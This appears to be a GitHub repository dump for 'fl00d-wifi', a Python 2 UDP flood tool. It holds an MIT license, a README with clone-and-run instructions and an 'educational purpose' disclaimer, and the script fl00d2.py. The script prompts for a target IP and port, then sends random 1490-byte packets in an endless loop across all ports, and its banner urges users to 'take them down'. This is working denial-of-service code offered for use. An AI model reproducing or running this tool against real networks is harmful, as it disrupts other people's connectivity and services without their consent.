├── LICENSE ├── README.md ├── _config.yml ├── fl00d-wifi-poster.png └── fl00d2.py /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Mr.Ruthless Devil 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # fl00d-wifi 2 | Slow down the network with ip (you should be connected to that network or wifi ) 3 | 4 |

5 | 6 | 7 |

8 | 9 |

10 | 11 |

12 | 13 |

14 | 15 | 16 | 17 | 18 | 19 |

20 | 21 |

22 | 23 |

24 | 25 |

26 | 27 |

28 | 29 | # USAGE 30 | * `apt update && upgrade` 31 | * `apt install git -y` 32 | * `git clone https://github.com/Alygnt/fl00d-wifi` 33 | * `cd fl00d` 34 | * `python2 fl00d2.py` 35 | (That's it enjoy) 36 | 37 | ## THANKS TO 38 | ***AndroSec1337 Cyber Team*** 39 | ***DedSecTL*** 40 | 41 | ## WARNING : 42 | ***This tool is only for educational purpose. If you use this tool for other purposes except education we will not be responsible in such cases.*** 43 | 44 | -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-slate -------------------------------------------------------------------------------- /fl00d-wifi-poster.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alygnt/fl00d-wifi/dec9c5a1a68477c3e685f9729b8283ca379ce5c1/fl00d-wifi-poster.png -------------------------------------------------------------------------------- /fl00d2.py: -------------------------------------------------------------------------------- 1 | #!/system/bin/python 2 | #Fl00d 2.0 27-06-2017 (1:42) 3 | #Tool for UDP Flood 4 | #Authorized by DedSecTL 5 | #AndroSec1337 Cyber Team 6 | import socket, os, random, time 7 | 8 | # Color 9 | B = '\033[1m' 10 | R = '\033[31m' 11 | N = '\033[0m' 12 | 13 | # Code time ################## 14 | from datetime import datetime 15 | now = datetime.now() 16 | hour = now.hour 17 | minute = now.minute 18 | day = now.day 19 | month = now.month 20 | year = now.year 21 | ############################## 22 | 23 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 24 | bytes = random._urandom(1490) 25 | os.system("clear") 26 | print B+"@@@@@@@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@" 27 | print "@@@@@@@@ @@@ @@@@@@@@@@ @@@@@@@@@@ @@@ @@@@" 28 | print "@@! @@! @@! @@@@ @@! @@@@ @@! @@@" 29 | print "!@! !@! !@! @!@!@ !@! @!@!@ !@! @!@" 30 | print "@!!!:! @!! @!@ @! !@! @!@ @! !@! @!@ !@!" 31 | print "!!!!!: !!! !@!!! !!! !@!!! !!! !@! !!!" 32 | print "!!: !!: !!:! !!! !!:! !!! !!: !!!" 33 | print ":!: :!: :!: !:! :!: !:! :!: !:!" 34 | print "::: ::::::: :::::::::: :::::::::: ;:: :::" 35 | print "::: ::::::: :::::::: :::::::: :::::::::"+N 36 | print "["+B+""+R+"#"+N+"] "+B+""+R+" "+N+" Fl00d 2.0 - "+B+""+R+"RDXLR"+N 37 | print 38 | print "#T4ke 7hem d0wn vroh - D0n7 g1ve up - Fl00d th3m" 39 | print "#H4ck 4ll 7he 7h1ng - F1ght f0r Ju5t1c3 - K1ll th3m" 40 | print 41 | ip = raw_input('[$] T@rget 1P: ') 42 | port = input('[$] P0rt: ') 43 | os.system("clear") 44 | print "Fl00d attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) 45 | time.sleep(3) 46 | print 47 | sent = 0 48 | while True: 49 | sock.sendto(bytes, (ip,port)) 50 | sent = sent + 1 51 | port = port + 1 52 | print "Sent %s packet to %s throught port:%s"%(sent,ip,port) 53 | if port == 65534: 54 | port = 1 55 | --------------------------------------------------------------------------------